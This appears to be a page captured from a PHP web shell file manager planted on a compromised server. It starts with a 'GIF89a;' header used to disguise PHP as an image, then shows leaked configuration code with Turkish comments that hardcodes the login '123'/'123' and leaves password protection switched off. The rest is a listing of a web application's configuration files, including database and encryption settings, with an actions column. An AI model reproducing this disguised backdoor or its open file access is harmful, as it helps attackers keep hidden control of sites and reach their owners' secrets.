GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| Boot | --- | April 30 2025 14:03:02. | 0755 | ||
| App.php | 7.71 KB | April 30 2025 14:03:02. | 0644 | ||
| Autoload.php | 2.96 KB | April 30 2025 14:03:02. | 0644 | ||
| CURLRequest.php | 551 bytes | April 30 2025 14:03:02. | 0644 | ||
| Cache.php | 5.69 KB | April 30 2025 14:03:02. | 0644 | ||
| Constants.php | 3.55 KB | April 30 2025 14:03:02. | 0644 | ||
| ContentSecurityPolicy.php | 4.13 KB | April 30 2025 14:03:02. | 0644 | ||
| Cookie.php | 3.47 KB | April 30 2025 14:03:02. | 0644 | ||
| Cors.php | 3.43 KB | April 30 2025 14:03:02. | 0644 | ||
| Database.php | 6.15 KB | April 30 2025 14:03:02. | 0644 | ||
| DocTypes.php | 3.01 KB | April 30 2025 14:03:02. | 0644 | ||
| Email.php | 2.28 KB | April 30 2025 14:03:02. | 0644 | ||
| Encryption.php | 2.78 KB | April 30 2025 14:03:02. | 0644 | ||
| Events.php | 1.83 KB | April 30 2025 14:03:02. | 0644 | ||
| Exceptions.php | 3.91 KB | April 30 2025 14:03:02. | 0644 | ||
| Feature.php | 1.00 KB | April 30 2025 14:03:02. | 0644 | ||
| Filters.php | 3.27 KB | April 30 2025 14:03:02. | 0644 | ||
| ForeignCharacters.php | 174 bytes | April 30 2025 14:03:02. | 0644 | ||
| Format.php | 2.15 KB | April 30 2025 14:03:02. | 0644 | ||
| Generators.php | 2.08 KB | April 30 2025 14:03:02. | 0644 | ||
| Honeypot.php | 855 bytes | April 30 2025 14:03:02. | 0644 | ||
| Images.php | 708 bytes | April 30 2025 14:03:02. | 0644 | ||
| Kint.php | 1.84 KB | April 30 2025 14:03:02. | 0644 | ||
| Logger.php | 5.85 KB | April 30 2025 14:03:02. | 0644 | ||
| Migrations.php | 1.55 KB | April 30 2025 14:03:02. | 0644 | ||
| Mimes.php | 15.35 KB | April 30 2025 14:03:02. | 0644 | ||
| Modules.php | 2.26 KB | April 30 2025 14:03:02. | 0644 | ||
| Optimize.php | 944 bytes | April 30 2025 14:03:02. | 0644 | ||
| Pager.php | 1.23 KB | April 30 2025 14:03:02. | 0644 | ||
| Paths.php | 2.68 KB | April 30 2025 14:03:02. | 0644 | ||
| Publisher.php | 807 bytes | April 30 2025 14:03:02. | 0644 | ||
| Routes.php | 2.34 KB | April 30 2025 14:03:02. | 0644 | ||
| Routing.php | 3.59 KB | April 30 2025 14:03:02. | 0644 | ||
| Security.php | 2.79 KB | April 30 2025 14:03:02. | 0644 | ||
| Services.php | 921 bytes | April 30 2025 14:03:02. | 0644 | ||
| Session.php | 4.47 KB | April 30 2025 14:03:02. | 0644 | ||
| Toolbar.php | 4.45 KB | April 30 2025 14:03:02. | 0644 | ||
| UserAgents.php | 9.58 KB | April 30 2025 14:03:02. | 0644 | ||
| Validation.php | 1.16 KB | April 30 2025 14:03:02. | 0644 | ||
| View.php | 2.06 KB | April 30 2025 14:03:02. | 0644 |